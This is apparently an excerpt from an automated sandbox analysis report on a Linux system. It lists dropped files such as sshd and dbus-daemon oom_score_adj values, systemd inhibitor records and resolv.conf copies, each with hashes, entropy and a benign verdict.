                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: -1000.
                            /proc/5798/oom_score_adj
                            Process:/usr/bin/dbus-daemon
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:V:V
                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: 0
                            /proc/5855/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: -1000.
                            /proc/6286/oom_score_adj
                            Process:/usr/bin/dbus-daemon
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:V:V
                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                            Malicious:false
                            Preview: 0
                            /proc/6312/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Preview: -1000.
                            /proc/6992/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Preview: -1000.
                            /proc/7407/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Preview: -1000.
                            /proc/7543/oom_score_adj
                            Process:/usr/bin/dbus-daemon
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:V:V
                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                            Malicious:false
                            Preview: 0
                            /run/sshd.pid
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            SSDEEP:3:iVc:ii
                            MD5:79AEA331F06F8D90C1BA542F0A64A8DE
                            SHA1:741023052EA87CB24C9888963F486149C797D128
                            SHA-256:472F04A8C2A04E16F81098265E237C89424B908C807F4E6BB5D994D27C527E59
                            SHA-512:862CC56DF0C363EEDE57AD5E5E4ADABEF411E571AA2EFE52997121DEF4DA8E6C11A99D76A62E45E58E96AA543BF5E9FEC5C7493DE523286844A7F8ECAE510669
                            Malicious:false
                            Preview: 7407.
                            /run/systemd/inhibit/.#10NlkwDx
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):249
                            Entropy (8bit):5.1334532270294
                            Encrypted:false
                            SSDEEP:6:SbFuFyL8NEL1QXccIRI/cIlG/cI/0tmWvyPXaLX6zpp7Rl:qgFqXQXTI1IltIQvEy0Rl
                            MD5:AF66846AF74C40610BAFB25EE938E4A4
                            SHA1:FE0B6DDD55722B8EF394C736B3868CFF6744AADB
                            SHA-256:BD8502E132D917AEBA0DBEC8BC8A7577225E2292D5DFCA93E7BF8E9676749D7E
                            SHA-512:382125456440D04D4C16AEAF60066659FEFC4F14AF76A215901DD2AC13E1C24FB37F0C13BA9BD5CE7D32633544658FB855834084CC69576FEEEBF96BBB7D9EDD
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=handle-power-key:handle-suspend-key:handle-hibernate-key:handle-lid-switch.MODE=block.UID=1000.PID=2123.WHO=xfce4-power-manager.WHY=xfce4-power-manager handles these events.FIFO=/run/systemd/inhibit/10.ref.
                            /run/systemd/inhibit/.#12WzZgf
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1BKY53w
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1GAO4W5
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1NfQcC6
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1h2BAS0
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1hg7ovx
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1nU4LUu
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1sclL5Z
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1suv1Gi
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#1zsbRCu
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):163
                            Entropy (8bit):4.963022897344031
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                            MD5:740A3D9E5BDC608745C17F00098F3B54
                            SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                            SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                            SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                            /run/systemd/inhibit/.#3Iv8zNx
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):204
                            Entropy (8bit):4.981193950793451
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWNQK4wq29ifx+q+zgCtkBFqG8QCfA/dcvWZ47tX8/SfWADv:SbFuFyL8KQKeLfUq6gckMQ22dKWZAlRT
                            MD5:A1C4614191983B812562258CC03B7BB1
                            SHA1:1B6B9CE5685DDE148191EB555E97315711649F50
                            SHA-256:7AFBD3A498991585285E7B73720083EAFC602DD1310D179FF8C3772F98E21134
                            SHA-512:A16EF07B928AFE1779BA2E154641039206ECA3F219DE48163D31BFC91FD4313DADAF771EE4269E3CC03B89C81C759A28310BD24D701E5B3DBF8036C226B4B325
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=shutdown.MODE=delay.UID=0.PID=884.WHO=Unattended Upgrades Shutdown.WHY=Stop ongoing upgrades or perform upgrades before shutdown.FIFO=/run/systemd/inhibit/3.ref.
                            /run/systemd/inhibit/.#4AerQex
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):143
                            Entropy (8bit):5.109910338925392
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifSU1IppTMXSHK72X8/SflY:SbFuFyL8OAApfZApLHK7wRS
                            MD5:E374D3E418E44E444D586B8A667BA7B9
                            SHA1:10E313EA3C86F242B0921AB80E794817F858DE3C
                            SHA-256:E3C381103F615FE4A0F85F9F07DBD40A4E8DB91EAA187D48472C7EEC6772C23C
                            SHA-512:42AD26F8C651EF390A526392C492526AA81919D09085D7DB9A6DE067AADEE06AA8E908638667AFAE1A79F2C632E430868E9D87D36BF45DE0E708BFE83993E991
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.
                            /run/systemd/inhibit/.#4C47xyt
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):143
                            Entropy (8bit):5.109910338925392
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifSU1IppTMXSHK72X8/SflY:SbFuFyL8OAApfZApLHK7wRS
                            MD5:E374D3E418E44E444D586B8A667BA7B9
                            SHA1:10E313EA3C86F242B0921AB80E794817F858DE3C
                            SHA-256:E3C381103F615FE4A0F85F9F07DBD40A4E8DB91EAA187D48472C7EEC6772C23C
                            SHA-512:42AD26F8C651EF390A526392C492526AA81919D09085D7DB9A6DE067AADEE06AA8E908638667AFAE1A79F2C632E430868E9D87D36BF45DE0E708BFE83993E991
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.
                            /run/systemd/inhibit/.#4aAOR7X
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):143
                            Entropy (8bit):5.109910338925392
                            Encrypted:false
                            SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifSU1IppTMXSHK72X8/SflY:SbFuFyL8OAApfZApLHK7wRS
                            MD5:E374D3E418E44E444D586B8A667BA7B9
                            SHA1:10E313EA3C86F242B0921AB80E794817F858DE3C
                            SHA-256:E3C381103F615FE4A0F85F9F07DBD40A4E8DB91EAA187D48472C7EEC6772C23C
                            SHA-512:42AD26F8C651EF390A526392C492526AA81919D09085D7DB9A6DE067AADEE06AA8E908638667AFAE1A79F2C632E430868E9D87D36BF45DE0E708BFE83993E991
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.
                            /run/systemd/inhibit/.#4gJiWe7
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):143
                            Entropy (8bit):5.109910338925392
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.
                            /run/systemd/inhibit/.#4s0F5Li
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):143
                            Entropy (8bit):5.109910338925392
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.
                            /run/systemd/inhibit/.#5LrNTPy
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):198
                            Entropy (8bit):5.229502665506919
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=handle-power-key:handle-suspend-key:handle-hibernate-key.MODE=block.UID=127.PID=1648.WHO=gdm.WHY=GNOME handling keypresses.FIFO=/run/systemd/inhibit/5.ref.
                            /run/systemd/inhibit/.#6ZLxYkv
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):147
                            Entropy (8bit):5.1669277917692895
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=127.PID=1648.WHO=gdm.WHY=GNOME handling keypresses.FIFO=/run/systemd/inhibit/6.ref.
                            /run/systemd/inhibit/.#7bGwKDw
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):152
                            Entropy (8bit):5.138883971711133
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=127.PID=1668.WHO=gdm.WHY=GNOME needs to lock the screen.FIFO=/run/systemd/inhibit/7.ref.
                            /run/systemd/inhibit/.#83hcOfx
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):164
                            Entropy (8bit):5.11427950700706
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=1000.PID=2028.WHO=xfce4-screensaver.WHY=Locking screen before sleep.FIFO=/run/systemd/inhibit/8.ref.
                            /run/systemd/resolve/.#resolv.confCboaha
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):603
                            Entropy (8bit):4.60400988248083
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients directly to.# all known uplink DNS servers. This file lists all configured search domains..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 1.1.1.1.nameserver 8.8.8.8.
                            /run/systemd/resolve/.#resolv.confb8fRMh
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):603
                            Entropy (8bit):4.60400988248083
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients directly to.# all known uplink DNS servers. This file lists all configured search domains..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 1.1.1.1.nameserver 8.8.8.8.
                            /run/systemd/resolve/.#resolv.confbWzEo8
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):603
                            Entropy (8bit):4.60400988248083
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients directly to.# all known uplink DNS servers. This file lists all configured search domains..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 1.1.1.1.nameserver 8.8.8.8.
                            /run/systemd/resolve/.#resolv.confgCJZAP
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):603
                            Entropy (8bit):4.60400988248083
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients directly to.# all known uplink DNS servers. This file lists all configured search domains..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 1.1.1.1.nameserver 8.8.8.8.
                            /run/systemd/resolve/.#resolv.confoqrlLH
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):603
                            Entropy (8bit):4.60400988248083
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients directly to.# all known uplink DNS servers. This file lists all configured search domains..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 1.1.1.1.nameserver 8.8.8.8.
                            /run/systemd/resolve/.#stub-resolv.confBReyjO
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):717
                            Entropy (8bit):4.618141658133841
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients to the.# internal DNS stub resolver of systemd-resolved. This file lists all.# configured search domains..#.# Run "resolvectl status" to see details about the uplink DNS servers.# currently in use..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 127.0.0.53.options edns0 trust-ad.
                            /run/systemd/resolve/.#stub-resolv.confEODxFa
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):717
                            Entropy (8bit):4.618141658133841
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients to the.# internal DNS stub resolver of systemd-resolved. This file lists all.# configured search domains..#.# Run "resolvectl status" to see details about the uplink DNS servers.# currently in use..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 127.0.0.53.options edns0 trust-ad.
                            /run/systemd/resolve/.#stub-resolv.confj0zCb8
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):717
                            Entropy (8bit):4.618141658133841
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients to the.# internal DNS stub resolver of systemd-resolved. This file lists all.# configured search domains..#.# Run "resolvectl status" to see details about the uplink DNS servers.# currently in use..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 127.0.0.53.options edns0 trust-ad.
                            /run/systemd/resolve/.#stub-resolv.confjKIhFG
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):717
                            Entropy (8bit):4.618141658133841
                            Encrypted:false
                            Malicious:false
